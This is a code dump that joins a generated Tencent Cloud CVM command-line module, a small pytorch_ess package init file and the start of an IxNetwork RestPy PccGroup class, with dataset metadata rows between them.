result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doModifyInstancesProject(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("ModifyInstancesProject", g_param[OptionsDefine.Version])
return
param = {
"InstanceIds": Utils.try_to_json(argv, "--InstanceIds"),
"ProjectId": Utils.try_to_json(argv, "--ProjectId"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ModifyInstancesProjectRequest()
model.from_json_string(json.dumps(param))
rsp = client.ModifyInstancesProject(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doStartInstances(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("StartInstances", g_param[OptionsDefine.Version])
return
param = {
"InstanceIds": Utils.try_to_json(argv, "--InstanceIds"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.StartInstancesRequest()
model.from_json_string(json.dumps(param))
rsp = client.StartInstances(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeDisasterRecoverGroups(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("DescribeDisasterRecoverGroups", g_param[OptionsDefine.Version])
return
param = {
"DisasterRecoverGroupIds": Utils.try_to_json(argv, "--DisasterRecoverGroupIds"),
"Name": argv.get("--Name"),
"Offset": Utils.try_to_json(argv, "--Offset"),
"Limit": Utils.try_to_json(argv, "--Limit"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeDisasterRecoverGroupsRequest()
model.from_json_string(json.dumps(param))
rsp = client.DescribeDisasterRecoverGroups(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeKeyPairs(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("DescribeKeyPairs", g_param[OptionsDefine.Version])
return
param = {
"KeyIds": Utils.try_to_json(argv, "--KeyIds"),
"Filters": Utils.try_to_json(argv, "--Filters"),
"Offset": Utils.try_to_json(argv, "--Offset"),
"Limit": Utils.try_to_json(argv, "--Limit"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeKeyPairsRequest()
model.from_json_string(json.dumps(param))
rsp = client.DescribeKeyPairs(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeReservedInstancesOfferings(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("DescribeReservedInstancesOfferings", g_param[OptionsDefine.Version])
return
param = {
"DryRun": Utils.try_to_json(argv, "--DryRun"),
"Offset": Utils.try_to_json(argv, "--Offset"),
"Limit": Utils.try_to_json(argv, "--Limit"),
"MaxDuration": Utils.try_to_json(argv, "--MaxDuration"),
"MinDuration": Utils.try_to_json(argv, "--MinDuration"),
"Filters": Utils.try_to_json(argv, "--Filters"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeReservedInstancesOfferingsRequest()
model.from_json_string(json.dumps(param))
rsp = client.DescribeReservedInstancesOfferings(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeHosts(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("DescribeHosts", g_param[OptionsDefine.Version])
return
param = {
"Filters": Utils.try_to_json(argv, "--Filters"),
"Offset": Utils.try_to_json(argv, "--Offset"),
"Limit": Utils.try_to_json(argv, "--Limit"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeHostsRequest()
model.from_json_string(json.dumps(param))
rsp = client.DescribeHosts(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doAllocateHosts(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("AllocateHosts", g_param[OptionsDefine.Version])
return
param = {
"Placement": Utils.try_to_json(argv, "--Placement"),
"ClientToken": argv.get("--ClientToken"),
"HostChargePrepaid": Utils.try_to_json(argv, "--HostChargePrepaid"),
"HostChargeType": argv.get("--HostChargeType"),
"HostType": argv.get("--HostType"),
"HostCount": Utils.try_to_json(argv, "--HostCount"),
"TagSpecification": Utils.try_to_json(argv, "--TagSpecification"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.AllocateHostsRequest()
model.from_json_string(json.dumps(param))
rsp = client.AllocateHosts(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeInternetChargeTypeConfigs(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("DescribeInternetChargeTypeConfigs", g_param[OptionsDefine.Version])
return
param = {
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeInternetChargeTypeConfigsRequest()
model.from_json_string(json.dumps(param))
rsp = client.DescribeInternetChargeTypeConfigs(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doRebootInstances(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("RebootInstances", g_param[OptionsDefine.Version])
return
param = {
"InstanceIds": Utils.try_to_json(argv, "--InstanceIds"),
"ForceReboot": Utils.try_to_json(argv, "--ForceReboot"),
"StopType": argv.get("--StopType"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.RebootInstancesRequest()
model.from_json_string(json.dumps(param))
rsp = client.RebootInstances(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeInstanceTypeConfigs(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("DescribeInstanceTypeConfigs", g_param[OptionsDefine.Version])
return
param = {
"Filters": Utils.try_to_json(argv, "--Filters"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeInstanceTypeConfigsRequest()
model.from_json_string(json.dumps(param))
rsp = client.DescribeInstanceTypeConfigs(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDisassociateSecurityGroups(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("DisassociateSecurityGroups", g_param[OptionsDefine.Version])
return
param = {
"SecurityGroupIds": Utils.try_to_json(argv, "--SecurityGroupIds"),
"InstanceIds": Utils.try_to_json(argv, "--InstanceIds"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DisassociateSecurityGroupsRequest()
model.from_json_string(json.dumps(param))
rsp = client.DisassociateSecurityGroups(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
CLIENT_MAP = {
"v20170312": cvm_client_v20170312,
}
MODELS_MAP = {
"v20170312": models_v20170312,
}
ACTION_MAP = {
"DescribeImageQuota": doDescribeImageQuota,
"StopInstances": doStopInstances,
"DescribeInstancesStatus": doDescribeInstancesStatus,
"ModifyImageSharePermission": doModifyImageSharePermission,
"DescribeImageSharePermission": doDescribeImageSharePermission,
"InquiryPriceRunInstances": doInquiryPriceRunInstances,
"ModifyHostsAttribute": doModifyHostsAttribute,
"DescribeImages": doDescribeImages,
"DescribeZoneInstanceConfigInfos": doDescribeZoneInstanceConfigInfos,
"ModifyInstancesAttribute": doModifyInstancesAttribute,
"DescribeRegions": doDescribeRegions,
"InquiryPriceResetInstancesInternetMaxBandwidth": doInquiryPriceResetInstancesInternetMaxBandwidth,
"DisassociateInstancesKeyPairs": doDisassociateInstancesKeyPairs,
"CreateKeyPair": doCreateKeyPair,
"DeleteKeyPairs": doDeleteKeyPairs,
"CreateDisasterRecoverGroup": doCreateDisasterRecoverGroup,
"DescribeInstances": doDescribeInstances,
"ImportKeyPair": doImportKeyPair,
"AssociateInstancesKeyPairs": doAssociateInstancesKeyPairs,
"RunInstances": doRunInstances,
"DeleteImages": doDeleteImages,
"InquiryPriceResizeInstanceDisks": doInquiryPriceResizeInstanceDisks,
"TerminateInstances": doTerminateInstances,
"ModifyInstancesVpcAttribute": doModifyInstancesVpcAttribute,
"InquiryPriceResetInstance": doInquiryPriceResetInstance,
"DescribeDisasterRecoverGroupQuota": doDescribeDisasterRecoverGroupQuota,
"ResetInstancesPassword": doResetInstancesPassword,
"PurchaseReservedInstancesOffering": doPurchaseReservedInstancesOffering,
"ResizeInstanceDisks": doResizeInstanceDisks,
"DescribeReservedInstances": doDescribeReservedInstances,
"DescribeZones": doDescribeZones,
"CreateImage": doCreateImage,
"AssociateSecurityGroups": doAssociateSecurityGroups,
"ResetInstancesType": doResetInstancesType,
"ModifyImageAttribute": doModifyImageAttribute,
"DescribeInstancesOperationLimit": doDescribeInstancesOperationLimit,
"InquiryPriceResetInstancesType": doInquiryPriceResetInstancesType,
"DescribeInstanceFamilyConfigs": doDescribeInstanceFamilyConfigs,
"DeleteDisasterRecoverGroups": doDeleteDisasterRecoverGroups,
"DescribeImportImageOs": doDescribeImportImageOs,
"ResetInstancesInternetMaxBandwidth": doResetInstancesInternetMaxBandwidth,
"ResetInstance": doResetInstance,
"SyncImages": doSyncImages,
"ModifyKeyPairAttribute": doModifyKeyPairAttribute,
"ImportImage": doImportImage,
"ModifyDisasterRecoverGroupAttribute": doModifyDisasterRecoverGroupAttribute,
"DescribeInstanceVncUrl": doDescribeInstanceVncUrl,
"ModifyInstancesProject": doModifyInstancesProject,
"StartInstances": doStartInstances,
"DescribeDisasterRecoverGroups": doDescribeDisasterRecoverGroups,
"DescribeKeyPairs": doDescribeKeyPairs,
"DescribeReservedInstancesOfferings": doDescribeReservedInstancesOfferings,
"DescribeHosts": doDescribeHosts,
"AllocateHosts": doAllocateHosts,
"DescribeInternetChargeTypeConfigs": doDescribeInternetChargeTypeConfigs,
"RebootInstances": doRebootInstances,
"DescribeInstanceTypeConfigs": doDescribeInstanceTypeConfigs,
"DisassociateSecurityGroups": doDisassociateSecurityGroups,
}
AVAILABLE_VERSION_LIST = [
v20170312.version,
]
AVAILABLE_VERSIONS = {
'v' + v20170312.version.replace('-', ''): {"help": v20170312_help.INFO,"desc": v20170312_help.DESC},
}
def cvm_action(argv, arglist):
if "help" in argv:
versions = sorted(AVAILABLE_VERSIONS.keys())
opt_v = "--" + OptionsDefine.Version
version = versions[-1]
if opt_v in argv:
version = 'v' + argv[opt_v].replace('-', '')
if version not in versions:
print("available versions: %s" % " ".join(AVAILABLE_VERSION_LIST))
return
action_str = ""
docs = AVAILABLE_VERSIONS[version]["help"]
desc = AVAILABLE_VERSIONS[version]["desc"]
for action, info in docs.items():
action_str += " %s\n" % action
action_str += Utils.split_str(" ", info["desc"], 120)
helpstr = HelpTemplate.SERVICE % {"name": "cvm", "desc": desc, "actions": action_str}
print(helpstr)
else:
print(ErrorMsg.FEW_ARG)
def version_merge():
help_merge = {}
for v in AVAILABLE_VERSIONS:
for action in AVAILABLE_VERSIONS[v]["help"]:
if action not in help_merge:
help_merge[action] = {}
help_merge[action]["cb"] = ACTION_MAP[action]
help_merge[action]["params"] = []
for param in AVAILABLE_VERSIONS[v]["help"][action]["params"]:
if param["name"] not in help_merge[action]["params"]:
help_merge[action]["params"].append(param["name"])
return help_merge
def register_arg(command):
cmd = NiceCommand("cvm", cvm_action)
command.reg_cmd(cmd)
cmd.reg_opt("help", "bool")
cmd.reg_opt(OptionsDefine.Version, "string")
help_merge = version_merge()
for actionName, action in help_merge.items():
c = NiceCommand(actionName, action["cb"])
cmd.reg_cmd(c)
c.reg_opt("help", "bool")
for param in action["params"]:
c.reg_opt("--" + param, "string")
for opt in OptionsDefine.ACTION_GLOBAL_OPT:
stropt = "--" + opt
c.reg_opt(stropt, "string")
def parse_global_arg(argv):
params = {}
for opt in OptionsDefine.ACTION_GLOBAL_OPT:
stropt = "--" + opt
if stropt in argv:
params[opt] = argv[stropt]
else:
params[opt] = None
if params[OptionsDefine.Version]:
params[OptionsDefine.Version] = "v" + params[OptionsDefine.Version].replace('-', '')
config_handle = Configure()
profile = config_handle.profile
if ("--" + OptionsDefine.Profile) in argv:
profile = argv[("--" + OptionsDefine.Profile)]
is_conexist, conf_path = config_handle._profile_existed(profile + "." + config_handle.configure)
is_creexist, cred_path = config_handle._profile_existed(profile + "." + config_handle.credential)
config = {}
cred = {}
if is_conexist:
config = config_handle._load_json_msg(conf_path)
if is_creexist:
cred = config_handle._load_json_msg(cred_path)
if os.environ.get(OptionsDefine.ENV_SECRET_ID):
cred[OptionsDefine.SecretId] = os.environ.get(OptionsDefine.ENV_SECRET_ID)
if os.environ.get(OptionsDefine.ENV_SECRET_KEY):
cred[OptionsDefine.SecretKey] = os.environ.get(OptionsDefine.ENV_SECRET_KEY)
if os.environ.get(OptionsDefine.ENV_REGION):
config[OptionsDefine.Region] = os.environ.get(OptionsDefine.ENV_REGION)
for param in params.keys():
if param == OptionsDefine.Version:
continue
if params[param] is None:
if param in [OptionsDefine.SecretKey, OptionsDefine.SecretId]:
if param in cred:
params[param] = cred[param]
else:
raise Exception("%s is invalid" % param)
else:
if param in config:
params[param] = config[param]
elif param == OptionsDefine.Region:
raise Exception("%s is invalid" % OptionsDefine.Region)
try:
if params[OptionsDefine.Version] is None:
version = config["cvm"][OptionsDefine.Version]
params[OptionsDefine.Version] = "v" + version.replace('-', '')
if params[OptionsDefine.Endpoint] is None:
params[OptionsDefine.Endpoint] = config["cvm"][OptionsDefine.Endpoint]
except Exception as err:
raise Exception("config file:%s error, %s" % (conf_path, str(err)))
versions = sorted(AVAILABLE_VERSIONS.keys())
if params[OptionsDefine.Version] not in versions:
raise Exception("available versions: %s" % " ".join(AVAILABLE_VERSION_LIST))
return params
def show_help(action, version):
docs = AVAILABLE_VERSIONS[version]["help"][action]
desc = AVAILABLE_VERSIONS[version]["desc"]
docstr = ""
for param in docs["params"]:
docstr += " %s\n" % ("--" + param["name"])
docstr += Utils.split_str(" ", param["desc"], 120)
helpmsg = HelpTemplate.ACTION % {"name": action, "service": "cvm", "desc": desc, "params": docstr}
print(helpmsg)
def get_actions_info():
config = Configure()
new_version = max(AVAILABLE_VERSIONS.keys())
version = new_version
try:
profile = config._load_json_msg(os.path.join(config.cli_path, "default.configure"))
version = profile["cvm"]["version"]
version = "v" + version.replace('-', '')
except Exception:
pass
if version not in AVAILABLE_VERSIONS.keys():
version = new_version
return AVAILABLE_VERSIONS[version]["help"]
| 41.905011 | 105 | 0.703957 | 10,382 | 96,172 | 6.316895 | 0.038336 | 0.063676 | 0.184837 | 0.068982 | 0.809155 | 0.798207 | 0.790598 | 0.783035 | 0.778125 | 0.739608 | 0 | 0.007477 | 0.176673 | 96,172 | 2,294 | 106 | 41.923278 | 0.820778 | 0.006249 | 0 | 0.716043 | 0 | 0 | 0.0989 | 0.024427 | 0 | 0 | 0 | 0 | 0 | 1 | 0.031496 | false | 0.003445 | 0.015748 | 0 | 0.077756 | 0.001969 | 0 | 0 | 0 | null | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
38196c69cfdb2a0ec42f4d585deeafb1d8eaa097 | 114 | py | Python | pytorch_ess/__init__.py | wjmaddox/pytorch_ess | 8e189666ce7381cf760666464384c634abbc4be2 | [
"Apache-2.0"
] | 1 | 2022-02-19T12:37:06.000Z | 2022-02-19T12:37:06.000Z | pytorch_ess/__init__.py | wjmaddox/pytorch_ess | 8e189666ce7381cf760666464384c634abbc4be2 | [
"Apache-2.0"
] | null | null | null | pytorch_ess/__init__.py | wjmaddox/pytorch_ess | 8e189666ce7381cf760666464384c634abbc4be2 | [
"Apache-2.0"
] | null | null | null | from .elliptical_slice import EllipticalSliceSampler
from .mean_elliptical_slice import MeanEllipticalSliceSampler | 57 | 61 | 0.921053 | 11 | 114 | 9.272727 | 0.636364 | 0.294118 | 0.411765 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.061404 | 114 | 2 | 61 | 57 | 0.953271 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
383dec07347c9429912110e3735d7b29111a18cd | 72,815 | py | Python | RestPy/ixnetwork_restpy/testplatform/sessions/ixnetwork/topology/pccgroup.py | ralfjon/IxNetwork | c0c834fbc465af69c12fd6b7cee4628baba7fff1 | [
"MIT"
] | null | null | null | RestPy/ixnetwork_restpy/testplatform/sessions/ixnetwork/topology/pccgroup.py | ralfjon/IxNetwork | c0c834fbc465af69c12fd6b7cee4628baba7fff1 | [
"MIT"
] | null | null | null | RestPy/ixnetwork_restpy/testplatform/sessions/ixnetwork/topology/pccgroup.py | ralfjon/IxNetwork | c0c834fbc465af69c12fd6b7cee4628baba7fff1 | [
"MIT"
] | null | null | null |
# Copyright 1997 - 2018 by IXIA Keysight
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from ixnetwork_restpy.base import Base
from ixnetwork_restpy.files import Files
class PccGroup(Base):
"""The PccGroup class encapsulates a user managed pccGroup node in the ixnetwork hierarchy.
An instance of the class can be obtained by accessing the PccGroup property from a parent instance.
The internal properties list will be empty when the property is accessed and is populated from the server using the find method.
The internal properties list can be managed by the user by using the add and remove methods.
"""
_SDM_NAME = 'pccGroup'
def __init__(self, parent):
super(PccGroup, self).__init__(parent)
@property
def LearnedInfo(self):
"""An instance of the LearnedInfo class.
Returns:
obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.topology.learnedinfo.learnedinfo.LearnedInfo)
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
from ixnetwork_restpy.testplatform.sessions.ixnetwork.topology.learnedinfo.learnedinfo import LearnedInfo
return LearnedInfo(self)
@property
def LearnedInfoUpdate(self):
"""An instance of the LearnedInfoUpdate class.
Returns:
obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.topology.learnedinfo.learnedinfoupdate.LearnedInfoUpdate)
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
from ixnetwork_restpy.testplatform.sessions.ixnetwork.topology.learnedinfo.learnedinfoupdate import LearnedInfoUpdate
return LearnedInfoUpdate(self)
@property
def PcReplyLspParameters(self):
"""An instance of the PcReplyLspParameters class.
Returns:
obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.topology.pcreplylspparameters.PcReplyLspParameters)
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
from ixnetwork_restpy.testplatform.sessions.ixnetwork.topology.pcreplylspparameters import PcReplyLspParameters
return PcReplyLspParameters(self)._select()
@property
def PcRequestMatchCriteria(self):
"""An instance of the PcRequestMatchCriteria class.
Returns:
obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.topology.pcrequestmatchcriteria.PcRequestMatchCriteria)
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
from ixnetwork_restpy.testplatform.sessions.ixnetwork.topology.pcrequestmatchcriteria import PcRequestMatchCriteria
return PcRequestMatchCriteria(self)._select()
@property
def PceInitiateLSPParameters(self):
"""An instance of the PceInitiateLSPParameters class.
Returns:
obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.topology.pceinitiatelspparameters.PceInitiateLSPParameters)
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
from ixnetwork_restpy.testplatform.sessions.ixnetwork.topology.pceinitiatelspparameters import PceInitiateLSPParameters
return PceInitiateLSPParameters(self)._select()
@property
def Active(self):
"""Activate/Deactivate Configuration
Returns:
obj(ixnetwork_restpy.multivalue.Multivalue)
"""
return self._get_attribute('active')
@property
def Authentication(self):
"""The type of cryptographic authentication to be used on this link interface
Returns:
obj(ixnetwork_restpy.multivalue.Multivalue)
"""
return self._get_attribute('authentication')
@property
def BurstInterval(self):
"""Interval in milisecond in which desired rate of messages needs to be maintained.
Returns:
obj(ixnetwork_restpy.multivalue.Multivalue)
"""
return self._get_attribute('burstInterval')
@property
def ConnectedVia(self):
"""List of layers this layer used to connect to the wire
Returns:
list(str[None|/api/v1/sessions/1/ixnetwork/topology?deepchild=*])
"""
return self._get_attribute('connectedVia')
@ConnectedVia.setter
def ConnectedVia(self, value):
self._set_attribute('connectedVia', value)
@property
def Count(self):
"""Number of elements inside associated multiplier-scaled container object, e.g. number of devices inside a Device Group
Returns:
number
"""
return self._get_attribute('count')
@property
def DeadInterval(self):
"""This is the time interval, after the expiration of which, a PCEP peer declares the session down if no PCEP message has been received.
Returns:
obj(ixnetwork_restpy.multivalue.Multivalue)
